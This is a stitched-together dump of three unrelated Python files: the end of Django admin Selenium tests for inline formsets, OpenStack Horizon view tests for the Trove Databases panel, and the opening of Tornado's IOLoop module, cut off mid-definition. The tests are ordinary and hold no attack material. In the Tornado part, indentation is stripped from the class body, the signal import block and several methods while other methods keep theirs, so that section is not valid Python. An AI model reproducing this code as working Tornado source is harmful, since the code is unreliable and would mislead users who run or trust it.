            'Add another Inner4 stacked')
        add_button.click()

        self.assertEqual(rows_length(), 4)

    def test_delete_stackeds(self):
        """
        Deleting dynamically added stacked inline rows removes them again.
        """
        self.admin_login(username='super', password='secret')
        self.selenium.get('%s%s' % (self.live_server_url,
            reverse('admin:admin_inlines_holder4_add')))

        inline_id = '#inner4stacked_set-group'

        # PEP 8 (E731): use a nested def rather than assigning a lambda.
        def rows_length():
            return len(self.selenium.find_elements_by_css_selector(
                '%s .dynamic-inner4stacked_set' % inline_id))

        self.assertEqual(rows_length(), 3)

        add_button = self.selenium.find_element_by_link_text(
            'Add another Inner4 stacked')
        add_button.click()
        add_button.click()

        self.assertEqual(rows_length(), 5, msg="sanity check")
        for delete_link in self.selenium.find_elements_by_css_selector(
                '%s .inline-deletelink' % inline_id):
            delete_link.click()
        self.assertEqual(rows_length(), 3)

    def test_add_inlines(self):
        """
        Ensure that the "Add another XXX" link correctly adds items to the
        inline form.
        """
        self.admin_login(username='super', password='secret')
        self.selenium.get('%s%s' % (self.live_server_url,
            reverse('admin:admin_inlines_profilecollection_add')))

        # Check that there's only one inline to start with and that it has the
        # correct ID.
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            '.dynamic-profile_set')), 1)
        self.assertEqual(self.selenium.find_elements_by_css_selector(
            '.dynamic-profile_set')[0].get_attribute('id'),
            'profile_set-0')
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            '.dynamic-profile_set#profile_set-0 input[name=profile_set-0-first_name]')), 1)
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            '.dynamic-profile_set#profile_set-0 input[name=profile_set-0-last_name]')), 1)

        # Add an inline
        self.selenium.find_element_by_link_text('Add another Profile').click()

        # Check that the inline has been added, that it has the right id, and
        # that it contains the right fields.
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            '.dynamic-profile_set')), 2)
        self.assertEqual(self.selenium.find_elements_by_css_selector(
            '.dynamic-profile_set')[1].get_attribute('id'), 'profile_set-1')
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            '.dynamic-profile_set#profile_set-1 input[name=profile_set-1-first_name]')), 1)
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            '.dynamic-profile_set#profile_set-1 input[name=profile_set-1-last_name]')), 1)

        # Let's add another one to be sure
        self.selenium.find_element_by_link_text('Add another Profile').click()
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            '.dynamic-profile_set')), 3)
        self.assertEqual(self.selenium.find_elements_by_css_selector(
            '.dynamic-profile_set')[2].get_attribute('id'), 'profile_set-2')
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            '.dynamic-profile_set#profile_set-2 input[name=profile_set-2-first_name]')), 1)
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            '.dynamic-profile_set#profile_set-2 input[name=profile_set-2-last_name]')), 1)

        # Enter some data and click 'Save'
        self.selenium.find_element_by_name('profile_set-0-first_name').send_keys('0 first name 1')
        self.selenium.find_element_by_name('profile_set-0-last_name').send_keys('0 last name 2')
        self.selenium.find_element_by_name('profile_set-1-first_name').send_keys('1 first name 1')
        self.selenium.find_element_by_name('profile_set-1-last_name').send_keys('1 last name 2')
        self.selenium.find_element_by_name('profile_set-2-first_name').send_keys('2 first name 1')
        self.selenium.find_element_by_name('profile_set-2-last_name').send_keys('2 last name 2')
        self.selenium.find_element_by_xpath('//input[@value="Save"]').click()
        self.wait_page_loaded()

        # Check that the objects have been created in the database
        self.assertEqual(ProfileCollection.objects.all().count(), 1)
        self.assertEqual(Profile.objects.all().count(), 3)

    def test_delete_inlines(self):
        """
        Deleting tabular inline rows removes them and re-sequences the IDs
        of the remaining rows.
        """
        self.admin_login(username='super', password='secret')
        self.selenium.get('%s%s' % (self.live_server_url,
            reverse('admin:admin_inlines_profilecollection_add')))

        # Add a few inlines
        self.selenium.find_element_by_link_text('Add another Profile').click()
        self.selenium.find_element_by_link_text('Add another Profile').click()
        self.selenium.find_element_by_link_text('Add another Profile').click()
        self.selenium.find_element_by_link_text('Add another Profile').click()
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            '#profile_set-group table tr.dynamic-profile_set')), 5)
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            'form#profilecollection_form tr.dynamic-profile_set#profile_set-0')), 1)
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            'form#profilecollection_form tr.dynamic-profile_set#profile_set-1')), 1)
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            'form#profilecollection_form tr.dynamic-profile_set#profile_set-2')), 1)
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            'form#profilecollection_form tr.dynamic-profile_set#profile_set-3')), 1)
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            'form#profilecollection_form tr.dynamic-profile_set#profile_set-4')), 1)

        # Click on a few delete buttons
        self.selenium.find_element_by_css_selector(
            'form#profilecollection_form tr.dynamic-profile_set#profile_set-1 td.delete a').click()
        self.selenium.find_element_by_css_selector(
            'form#profilecollection_form tr.dynamic-profile_set#profile_set-2 td.delete a').click()

        # Verify that they're gone and that the IDs have been re-sequenced
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            '#profile_set-group table tr.dynamic-profile_set')), 3)
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            'form#profilecollection_form tr.dynamic-profile_set#profile_set-0')), 1)
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            'form#profilecollection_form tr.dynamic-profile_set#profile_set-1')), 1)
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            'form#profilecollection_form tr.dynamic-profile_set#profile_set-2')), 1)

    def test_alternating_rows(self):
        """
        Dynamically added tabular inline rows keep the alternating
        row1/row2 CSS classes.
        """
        self.admin_login(username='super', password='secret')
        self.selenium.get('%s%s' % (self.live_server_url,
            reverse('admin:admin_inlines_profilecollection_add')))

        # Add a few inlines
        self.selenium.find_element_by_link_text('Add another Profile').click()
        self.selenium.find_element_by_link_text('Add another Profile').click()

        row_selector = 'form#profilecollection_form tr.dynamic-profile_set'
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            "%s.row1" % row_selector)), 2, msg="Expect two row1 styled rows")
        self.assertEqual(len(self.selenium.find_elements_by_css_selector(
            "%s.row2" % row_selector)), 1, msg="Expect one row2 styled row")

    def test_collapsed_inlines(self):
        # Collapsed inlines have SHOW/HIDE links.
        self.admin_login(username='super', password='secret')
        self.selenium.get(self.live_server_url + reverse('admin:admin_inlines_author_add'))
        # One field is in a stacked inline, other in a tabular one.
        test_fields = ['id_nonautopkbook_set-0-title', 'id_nonautopkbook_set-2-0-title']
        show_links = self.selenium.find_elements_by_link_text('SHOW')
        self.assertEqual(len(show_links), 2)
        for show_index, field_name in enumerate(test_fields, 0):
            self.assertFalse(self.selenium.find_element_by_id(field_name).is_displayed())
            show_links[show_index].click()
            self.assertTrue(self.selenium.find_element_by_id(field_name).is_displayed())
        hide_links = self.selenium.find_elements_by_link_text('HIDE')
        self.assertEqual(len(hide_links), 2)
        for hide_index, field_name in enumerate(test_fields, 0):
            self.assertTrue(self.selenium.find_element_by_id(field_name).is_displayed())
            hide_links[hide_index].click()
            self.assertFalse(self.selenium.find_element_by_id(field_name).is_displayed())
class SeleniumChromeTests(SeleniumFirefoxTests):
    # Re-runs the full Firefox suite against Chrome by swapping the driver.
    webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class SeleniumIETests(SeleniumFirefoxTests):
    # Re-runs the full Firefox suite against Internet Explorer.
    webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
|
|
# Copyright 2013 Mirantis Inc.
# Copyright 2013 Rackspace Hosting.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import django
from django.core.urlresolvers import reverse
from django import http
from django.utils import unittest
from mox3.mox import IsA # noqa
import six
from horizon import exceptions
from openstack_dashboard import api as dash_api
from openstack_dashboard.contrib.trove import api
from openstack_dashboard.test import helpers as test
from troveclient import common
INDEX_URL = reverse('horizon:project:databases:index')
LAUNCH_URL = reverse('horizon:project:databases:launch')
DETAILS_URL = reverse('horizon:project:databases:detail', args=['id'])
class DatabaseTests(test.TestCase):
    """
    Mox-based view tests for the Trove "Databases" panel.

    Each test first records the expected ``api.trove`` /
    ``dash_api.neutron`` calls on the stubs created by
    ``@test.create_stubs``, then calls ``self.mox.ReplayAll()`` and drives
    the view through Django's test client.  The recorded call sequence is
    significant: it must mirror the order in which the views issue the
    calls, so do not reorder the stub expectations below.
    """

    @test.create_stubs(
        {api.trove: ('instance_list', 'flavor_list')})
    def test_index(self):
        """Index view renders and shows IP or hostname in the Host column."""
        # Mock database instances
        databases = common.Paginated(self.databases.list())
        api.trove.instance_list(IsA(http.HttpRequest), marker=None)\
            .AndReturn(databases)
        # Mock flavors
        api.trove.flavor_list(IsA(http.HttpRequest))\
            .AndReturn(self.flavors.list())
        self.mox.ReplayAll()

        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(res, 'project/databases/index.html')
        # Check the Host column displaying ip or hostname
        self.assertContains(res, '10.0.0.3')
        self.assertContains(res, 'trove.instance-2.com')

    @test.create_stubs(
        {api.trove: ('instance_list', 'flavor_list')})
    def test_index_flavor_exception(self):
        """A flavor_list failure still renders the index with one error."""
        # Mock database instances
        databases = common.Paginated(self.databases.list())
        api.trove.instance_list(IsA(http.HttpRequest), marker=None)\
            .AndReturn(databases)
        # Mock flavors
        api.trove.flavor_list(IsA(http.HttpRequest))\
            .AndRaise(self.exceptions.trove)
        self.mox.ReplayAll()

        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(res, 'project/databases/index.html')
        self.assertMessageCount(res, error=1)

    @test.create_stubs(
        {api.trove: ('instance_list',)})
    def test_index_list_exception(self):
        """An instance_list failure still renders the index with one error."""
        # Mock database instances
        api.trove.instance_list(IsA(http.HttpRequest), marker=None)\
            .AndRaise(self.exceptions.trove)
        self.mox.ReplayAll()

        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(res, 'project/databases/index.html')
        self.assertMessageCount(res, error=1)

    @test.create_stubs(
        {api.trove: ('instance_list', 'flavor_list')})
    def test_index_pagination(self):
        """A paginated result exposes a "next" link with the last marker."""
        # Mock database instances
        databases = self.databases.list()
        last_record = databases[1]
        databases = common.Paginated(databases, next_marker="foo")
        api.trove.instance_list(IsA(http.HttpRequest), marker=None)\
            .AndReturn(databases)
        # Mock flavors
        api.trove.flavor_list(IsA(http.HttpRequest))\
            .AndReturn(self.flavors.list())
        self.mox.ReplayAll()

        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(res, 'project/databases/index.html')
        self.assertContains(
            res, 'marker=' + last_record.id)

    @test.create_stubs(
        {api.trove: ('instance_list', 'flavor_list')})
    def test_index_flavor_list_exception(self):
        """Flavor-list failure during pagination shows a single error."""
        # Mocking instances.
        databases = common.Paginated(self.databases.list())
        api.trove.instance_list(
            IsA(http.HttpRequest),
            marker=None,
        ).AndReturn(databases)
        # Mocking flavor list with raising an exception.
        api.trove.flavor_list(
            IsA(http.HttpRequest),
        ).AndRaise(self.exceptions.trove)
        self.mox.ReplayAll()

        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(res, 'project/databases/index.html')
        self.assertMessageCount(res, error=1)

    @test.create_stubs({
        api.trove: ('flavor_list', 'backup_list',
                    'datastore_list', 'datastore_version_list',
                    'instance_list'),
        dash_api.neutron: ('network_list',)})
    def test_launch_instance(self):
        """GET on the launch workflow renders the launch template."""
        api.trove.flavor_list(IsA(http.HttpRequest)).AndReturn(
            self.flavors.list())
        api.trove.backup_list(IsA(http.HttpRequest)).AndReturn(
            self.database_backups.list())
        api.trove.instance_list(IsA(http.HttpRequest)).AndReturn(
            self.databases.list())
        # Mock datastores
        api.trove.datastore_list(IsA(http.HttpRequest)).AndReturn(
            self.datastores.list())
        # Mock datastore versions
        api.trove.datastore_version_list(IsA(http.HttpRequest), IsA(str)).\
            AndReturn(self.datastore_versions.list())

        dash_api.neutron.network_list(IsA(http.HttpRequest),
                                      tenant_id=self.tenant.id,
                                      shared=False).AndReturn(
                                          self.networks.list()[:1])
        dash_api.neutron.network_list(IsA(http.HttpRequest),
                                      shared=True).AndReturn(
                                          self.networks.list()[1:])
        self.mox.ReplayAll()

        res = self.client.get(LAUNCH_URL)
        self.assertTemplateUsed(res, 'project/databases/launch.html')

    # django 1.7 and later does not handle the thrown Http302
    # exception well enough.
    # TODO(mrunge): re-check when django-1.8 is stable
    @unittest.skipIf(django.VERSION >= (1, 7, 0),
                     'Currently skipped with Django >= 1.7')
    @test.create_stubs({api.trove: ('flavor_list',)})
    def test_launch_instance_exception_on_flavors(self):
        """A flavor_list failure during launch redirects via Http302."""
        trove_exception = self.exceptions.nova
        api.trove.flavor_list(IsA(http.HttpRequest)).AndRaise(trove_exception)
        self.mox.ReplayAll()

        toSuppress = ["openstack_dashboard.dashboards.project.databases."
                      "workflows.create_instance",
                      "horizon.workflows.base"]

        # Suppress expected log messages in the test output
        loggers = []
        for cls in toSuppress:
            logger = logging.getLogger(cls)
            loggers.append((logger, logger.getEffectiveLevel()))
            logger.setLevel(logging.CRITICAL)

        try:
            with self.assertRaises(exceptions.Http302):
                self.client.get(LAUNCH_URL)
        finally:
            # Restore the previous log levels
            for (log, level) in loggers:
                log.setLevel(level)

    @test.create_stubs({
        api.trove: ('flavor_list', 'backup_list', 'instance_create',
                    'datastore_list', 'datastore_version_list',
                    'instance_list'),
        dash_api.neutron: ('network_list',)})
    def test_create_simple_instance(self):
        """POSTing the launch form creates an instance and redirects."""
        api.trove.flavor_list(IsA(http.HttpRequest)).AndReturn(
            self.flavors.list())

        api.trove.backup_list(IsA(http.HttpRequest)).AndReturn(
            self.database_backups.list())

        api.trove.instance_list(IsA(http.HttpRequest)).AndReturn(
            self.databases.list())

        # Mock datastores
        api.trove.datastore_list(IsA(http.HttpRequest))\
            .AndReturn(self.datastores.list())

        # Mock datastore versions
        api.trove.datastore_version_list(IsA(http.HttpRequest), IsA(str))\
            .AndReturn(self.datastore_versions.list())

        dash_api.neutron.network_list(IsA(http.HttpRequest),
                                      tenant_id=self.tenant.id,
                                      shared=False).AndReturn(
                                          self.networks.list()[:1])

        dash_api.neutron.network_list(IsA(http.HttpRequest),
                                      shared=True).AndReturn(
                                          self.networks.list()[1:])

        nics = [{"net-id": self.networks.first().id, "v4-fixed-ip": ''}]

        # Actual create database call
        api.trove.instance_create(
            IsA(http.HttpRequest),
            IsA(six.text_type),
            IsA(int),
            IsA(six.text_type),
            databases=None,
            datastore=IsA(six.text_type),
            datastore_version=IsA(six.text_type),
            restore_point=None,
            replica_of=None,
            users=None,
            nics=nics).AndReturn(self.databases.first())
        self.mox.ReplayAll()

        post = {
            'name': "MyDB",
            'volume': '1',
            'flavor': 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa',
            'network': self.networks.first().id,
            'datastore': 'mysql,5.5',
        }

        res = self.client.post(LAUNCH_URL, post)
        self.assertRedirectsNoFollow(res, INDEX_URL)

    @test.create_stubs({
        api.trove: ('flavor_list', 'backup_list', 'instance_create',
                    'datastore_list', 'datastore_version_list',
                    'instance_list'),
        dash_api.neutron: ('network_list',)})
    def test_create_simple_instance_exception(self):
        """An instance_create failure still redirects back to the index."""
        trove_exception = self.exceptions.nova
        api.trove.flavor_list(IsA(http.HttpRequest)).AndReturn(
            self.flavors.list())

        api.trove.backup_list(IsA(http.HttpRequest)).AndReturn(
            self.database_backups.list())

        api.trove.instance_list(IsA(http.HttpRequest)).AndReturn(
            self.databases.list())

        # Mock datastores
        api.trove.datastore_list(IsA(http.HttpRequest))\
            .AndReturn(self.datastores.list())

        # Mock datastore versions
        api.trove.datastore_version_list(IsA(http.HttpRequest), IsA(str))\
            .AndReturn(self.datastore_versions.list())

        dash_api.neutron.network_list(IsA(http.HttpRequest),
                                      tenant_id=self.tenant.id,
                                      shared=False).AndReturn(
                                          self.networks.list()[:1])

        dash_api.neutron.network_list(IsA(http.HttpRequest),
                                      shared=True).AndReturn(
                                          self.networks.list()[1:])

        nics = [{"net-id": self.networks.first().id, "v4-fixed-ip": ''}]

        # Actual create database call
        api.trove.instance_create(
            IsA(http.HttpRequest),
            IsA(six.text_type),
            IsA(int),
            IsA(six.text_type),
            databases=None,
            datastore=IsA(six.text_type),
            datastore_version=IsA(six.text_type),
            restore_point=None,
            replica_of=None,
            users=None,
            nics=nics).AndRaise(trove_exception)
        self.mox.ReplayAll()

        post = {
            'name': "MyDB",
            'volume': '1',
            'flavor': 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa',
            'network': self.networks.first().id,
            'datastore': 'mysql,5.5',
        }

        res = self.client.post(LAUNCH_URL, post)
        self.assertRedirectsNoFollow(res, INDEX_URL)

    @test.create_stubs(
        {api.trove: ('instance_get', 'flavor_get',)})
    def _test_details(self, database, with_designate=False):
        """Shared detail-view check: hostname when designate, IP otherwise."""
        api.trove.instance_get(IsA(http.HttpRequest), IsA(six.text_type))\
            .AndReturn(database)
        api.trove.flavor_get(IsA(http.HttpRequest), IsA(str))\
            .AndReturn(self.flavors.first())
        self.mox.ReplayAll()

        res = self.client.get(DETAILS_URL)
        self.assertTemplateUsed(res, 'project/databases/detail.html')
        if with_designate:
            self.assertContains(res, database.hostname)
        else:
            self.assertContains(res, database.ip[0])

    def test_details_with_ip(self):
        """Detail view shows the instance IP when no hostname is set."""
        database = self.databases.first()
        self._test_details(database, with_designate=False)

    def test_details_with_hostname(self):
        """Detail view shows the designate hostname when available."""
        database = self.databases.list()[1]
        self._test_details(database, with_designate=True)

    @test.create_stubs(
        {api.trove: ('instance_get', 'flavor_get', 'users_list',
                     'user_list_access', 'user_delete')})
    def test_user_delete(self):
        """Deleting a DB user from the users tab redirects back to it."""
        database = self.databases.first()
        user = self.database_users.first()
        user_db = self.database_user_dbs.first()

        database_id = database.id
        # Instead of using the user's ID, the api uses the user's name. BOOO!
        user_id = user.name

        # views.py: DetailView.get_data
        api.trove.instance_get(IsA(http.HttpRequest), IsA(six.text_type))\
            .AndReturn(database)
        api.trove.flavor_get(IsA(http.HttpRequest), IsA(str))\
            .AndReturn(self.flavors.first())

        # tabs.py: UserTab.get_user_data
        api.trove.users_list(IsA(http.HttpRequest),
                             database_id).AndReturn([user])
        api.trove.user_list_access(IsA(http.HttpRequest),
                                   database_id,
                                   user_id).AndReturn([user_db])

        # tables.py: DeleteUser.delete
        api.trove.user_delete(IsA(http.HttpRequest),
                              database_id,
                              user_id).AndReturn(None)
        self.mox.ReplayAll()

        details_url = reverse('horizon:project:databases:detail',
                              args=[database_id])
        url = details_url + '?tab=instance_details__users_tab'
        action_string = u"users__delete__%s" % user_id
        form_data = {'action': action_string}
        res = self.client.post(url, form_data)
        self.assertRedirectsNoFollow(res, url)

    @test.create_stubs({
        api.trove: ('instance_get', 'instance_resize_volume')})
    def test_resize_volume(self):
        """Submitting a larger volume size resizes and redirects to index."""
        database = self.databases.first()
        database_id = database.id
        database_size = database.volume.get('size')

        # views.py: DetailView.get_data
        api.trove.instance_get(IsA(http.HttpRequest), IsA(six.text_type))\
            .AndReturn(database)

        # forms.py: ResizeVolumeForm.handle
        api.trove.instance_resize_volume(IsA(http.HttpRequest),
                                         database_id,
                                         IsA(int)).AndReturn(None)
        self.mox.ReplayAll()

        url = reverse('horizon:project:databases:resize_volume',
                      args=[database_id])
        post = {
            'instance_id': database_id,
            'orig_size': database_size,
            'new_size': database_size + 1,
        }
        res = self.client.post(url, post)
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res, INDEX_URL)

    @test.create_stubs({api.trove: ('instance_get', )})
    def test_resize_volume_bad_value(self):
        """A non-increasing volume size is rejected with a form error."""
        database = self.databases.first()
        database_id = database.id
        database_size = database.volume.get('size')

        # views.py: DetailView.get_data
        api.trove.instance_get(IsA(http.HttpRequest), IsA(six.text_type))\
            .AndReturn(database)
        self.mox.ReplayAll()

        url = reverse('horizon:project:databases:resize_volume',
                      args=[database_id])
        post = {
            'instance_id': database_id,
            'orig_size': database_size,
            'new_size': database_size,
        }
        res = self.client.post(url, post)
        self.assertContains(
            res, "New size for volume must be greater than current size.")

    @test.create_stubs(
        {api.trove: ('instance_get',
                     'flavor_list')})
    def test_resize_instance_get(self):
        """The resize form lists every flavor except the current one."""
        database = self.databases.first()

        # views.py: DetailView.get_data
        api.trove.instance_get(IsA(http.HttpRequest), database.id)\
            .AndReturn(database)
        api.trove.flavor_list(IsA(http.HttpRequest)).\
            AndReturn(self.database_flavors.list())

        self.mox.ReplayAll()
        url = reverse('horizon:project:databases:resize_instance',
                      args=[database.id])

        res = self.client.get(url)
        self.assertTemplateUsed(res, 'project/databases/resize_instance.html')
        option = '<option value="%s">%s</option>'
        for flavor in self.database_flavors.list():
            if flavor.id == database.flavor['id']:
                self.assertNotContains(res, option % (flavor.id, flavor.name))
            else:
                self.assertContains(res, option % (flavor.id, flavor.name))

    @test.create_stubs(
        {api.trove: ('instance_get',
                     'flavor_list',
                     'instance_resize')})
    def test_resize_instance(self):
        """Submitting a new flavor resizes the instance and redirects."""
        database = self.databases.first()

        # views.py: DetailView.get_data
        api.trove.instance_get(IsA(http.HttpRequest), database.id)\
            .AndReturn(database)
        api.trove.flavor_list(IsA(http.HttpRequest)).\
            AndReturn(self.database_flavors.list())

        old_flavor = self.database_flavors.list()[0]
        new_flavor = self.database_flavors.list()[1]

        api.trove.instance_resize(IsA(http.HttpRequest),
                                  database.id,
                                  new_flavor.id).AndReturn(None)

        self.mox.ReplayAll()
        url = reverse('horizon:project:databases:resize_instance',
                      args=[database.id])
        post = {
            'instance_id': database.id,
            'old_flavor_name': old_flavor.name,
            'old_flavor_id': old_flavor.id,
            'new_flavor': new_flavor.id
        }
        res = self.client.post(url, post)
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res, INDEX_URL)

    @test.create_stubs({
        api.trove: ('flavor_list', 'backup_list', 'instance_create',
                    'datastore_list', 'datastore_version_list',
                    'instance_list', 'instance_get'),
        dash_api.neutron: ('network_list',)})
    def test_create_replica_instance(self):
        """Launching with a master creates a replica (replica_of is set)."""
        api.trove.flavor_list(IsA(http.HttpRequest)).AndReturn(
            self.flavors.list())

        api.trove.backup_list(IsA(http.HttpRequest)).AndReturn(
            self.database_backups.list())

        api.trove.instance_list(IsA(http.HttpRequest)).AndReturn(
            self.databases.list())

        api.trove.datastore_list(IsA(http.HttpRequest))\
            .AndReturn(self.datastores.list())

        api.trove.datastore_version_list(IsA(http.HttpRequest),
                                         IsA(str))\
            .AndReturn(self.datastore_versions.list())

        dash_api.neutron.network_list(IsA(http.HttpRequest),
                                      tenant_id=self.tenant.id,
                                      shared=False).\
            AndReturn(self.networks.list()[:1])

        dash_api.neutron.network_list(IsA(http.HttpRequest),
                                      shared=True).\
            AndReturn(self.networks.list()[1:])

        nics = [{"net-id": self.networks.first().id, "v4-fixed-ip": ''}]

        api.trove.instance_get(IsA(http.HttpRequest), IsA(six.text_type))\
            .AndReturn(self.databases.first())

        # Actual create database call
        api.trove.instance_create(
            IsA(http.HttpRequest),
            IsA(six.text_type),
            IsA(int),
            IsA(six.text_type),
            databases=None,
            datastore=IsA(six.text_type),
            datastore_version=IsA(six.text_type),
            restore_point=None,
            replica_of=self.databases.first().id,
            users=None,
            nics=nics).AndReturn(self.databases.first())
        self.mox.ReplayAll()

        post = {
            'name': "MyDB",
            'volume': '1',
            'flavor': 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa',
            'network': self.networks.first().id,
            'datastore': 'mysql,5.5',
            'initial_state': 'master',
            'master': self.databases.first().id
        }

        res = self.client.post(LAUNCH_URL, post)
        self.assertRedirectsNoFollow(res, INDEX_URL)
|
|
#!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""An I/O event loop for non-blocking sockets.
Typical applications will use a single `IOLoop` object, in the
`IOLoop.instance` singleton. The `IOLoop.start` method should usually
be called at the end of the ``main()`` function. Atypical applications may
use more than one `IOLoop`, such as one `IOLoop` per thread, or per `unittest`
case.
In addition to I/O events, the `IOLoop` can also schedule time-based events.
`IOLoop.add_timeout` is a non-blocking alternative to `time.sleep`.
"""
from __future__ import absolute_import, division, print_function, with_statement
import datetime
import errno
import functools
import heapq
import itertools
import logging
import numbers
import os
import select
import sys
import threading
import time
import traceback
import math
from tornado.concurrent import TracebackFuture, is_future
from tornado.log import app_log, gen_log
from tornado.platform.auto import set_close_exec, Waker
from tornado import stack_context
from tornado.util import PY3, Configurable, errno_from_exception, timedelta_to_seconds
try:
import signal
except ImportError:
signal = None
if PY3:
import _thread as thread
else:
import thread
_POLL_TIMEOUT = 3600.0
class TimeoutError(Exception):
    # NOTE(review): raised by time-limited IOLoop operations (presumably
    # run_sync, which is outside this chunk) — confirm against full module.
    pass
class IOLoop(Configurable):
"""A level-triggered I/O loop.
We use ``epoll`` (Linux) or ``kqueue`` (BSD and Mac OS X) if they
are available, or else we fall back on select(). If you are
implementing a system that needs to handle thousands of
simultaneous connections, you should use a system that supports
either ``epoll`` or ``kqueue``.
Example usage for a simple TCP server:
.. testcode::
import errno
import functools
import tornado.ioloop
import socket
def connection_ready(sock, fd, events):
while True:
try:
connection, address = sock.accept()
except socket.error as e:
if e.args[0] not in (errno.EWOULDBLOCK, errno.EAGAIN):
raise
return
connection.setblocking(0)
handle_connection(connection, address)
if __name__ == '__main__':
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setblocking(0)
sock.bind(("", port))
sock.listen(128)
io_loop = tornado.ioloop.IOLoop.current()
callback = functools.partial(connection_ready, sock)
io_loop.add_handler(sock.fileno(), callback, io_loop.READ)
io_loop.start()
.. testoutput::
:hide:
By default, a newly-constructed `IOLoop` becomes the thread's current
`IOLoop`, unless there already is a current `IOLoop`. This behavior
can be controlled with the ``make_current`` argument to the `IOLoop`
constructor: if ``make_current=True``, the new `IOLoop` will always
try to become current and it raises an error if there is already a
current instance. If ``make_current=False``, the new `IOLoop` will
not try to become current.
.. versionchanged:: 4.2
Added the ``make_current`` keyword argument to the `IOLoop`
constructor.
"""
# Constants from the epoll module
_EPOLLIN = 0x001
_EPOLLPRI = 0x002
_EPOLLOUT = 0x004
_EPOLLERR = 0x008
_EPOLLHUP = 0x010
_EPOLLRDHUP = 0x2000
_EPOLLONESHOT = (1 << 30)
_EPOLLET = (1 << 31)
# Our events map exactly to the epoll events
NONE = 0
READ = _EPOLLIN
WRITE = _EPOLLOUT
ERROR = _EPOLLERR | _EPOLLHUP
# Global lock for creating global IOLoop instance
_instance_lock = threading.Lock()
_current = threading.local()
    @staticmethod
    def instance():
        """Returns a global `IOLoop` instance.

        Most applications have a single, global `IOLoop` running on the
        main thread.  Use this method to get this instance from
        another thread.  In most other cases, it is better to use `current()`
        to get the current thread's `IOLoop`.
        """
        if not hasattr(IOLoop, "_instance"):
            with IOLoop._instance_lock:
                if not hasattr(IOLoop, "_instance"):
                    # New instance after double check: re-test under the lock
                    # so only one thread ever creates the singleton.
                    IOLoop._instance = IOLoop()
        return IOLoop._instance
    @staticmethod
    def initialized():
        """Returns true if the singleton instance has been created."""
        # The attribute is created lazily by instance()/install() and
        # removed again by clear_instance().
        return hasattr(IOLoop, "_instance")
    def install(self):
        """Installs this `IOLoop` object as the singleton instance.

        This is normally not necessary as `instance()` will create
        an `IOLoop` on demand, but you may want to call `install` to use
        a custom subclass of `IOLoop`.

        When using an `IOLoop` subclass, `install` must be called prior
        to creating any objects that implicitly create their own
        `IOLoop` (e.g., :class:`tornado.httpclient.AsyncHTTPClient`).
        """
        # Refuse to silently overwrite an already-installed singleton.
        assert not IOLoop.initialized()
        IOLoop._instance = self
    @staticmethod
    def clear_instance():
        """Clear the global `IOLoop` instance.

        .. versionadded:: 4.0
        """
        # Deleting the attribute makes initialized() return False again.
        if hasattr(IOLoop, "_instance"):
            del IOLoop._instance
@staticmethod
def current(instance=True):
"""Returns the current thread's `IOLoop`.
If an `IOLoop` is currently running or has been marked as
current by `make_current`, returns that instance. If there is
no current `IOLoop`, returns `IOLoop.instance()` (i.e. the
main thread's `IOLoop`, creating one if necessary) if ``instance``
is true.
In general you should use `IOLoop.current` as the default when
constructing an asynchronous object, and use `IOLoop.instance`
when you mean to communicate to the main thread from a different
one.
.. versionchanged:: 4.1
Added ``instance`` argument to control the fallback to
`IOLoop.instance()`.
"""
current = getattr(IOLoop._current, "instance", None)
if current is None and instance:
return IOLoop.instance()
return current
    def make_current(self):
        """Makes this the `IOLoop` for the current thread.

        An `IOLoop` automatically becomes current for its thread
        when it is started, but it is sometimes useful to call
        `make_current` explicitly before starting the `IOLoop`,
        so that code run at startup time can find the right
        instance.

        .. versionchanged:: 4.1
           An `IOLoop` created while there is no current `IOLoop`
           will automatically become current.
        """
        # Stored in a threading.local, so this marker is per-thread.
        IOLoop._current.instance = self
    @staticmethod
    def clear_current():
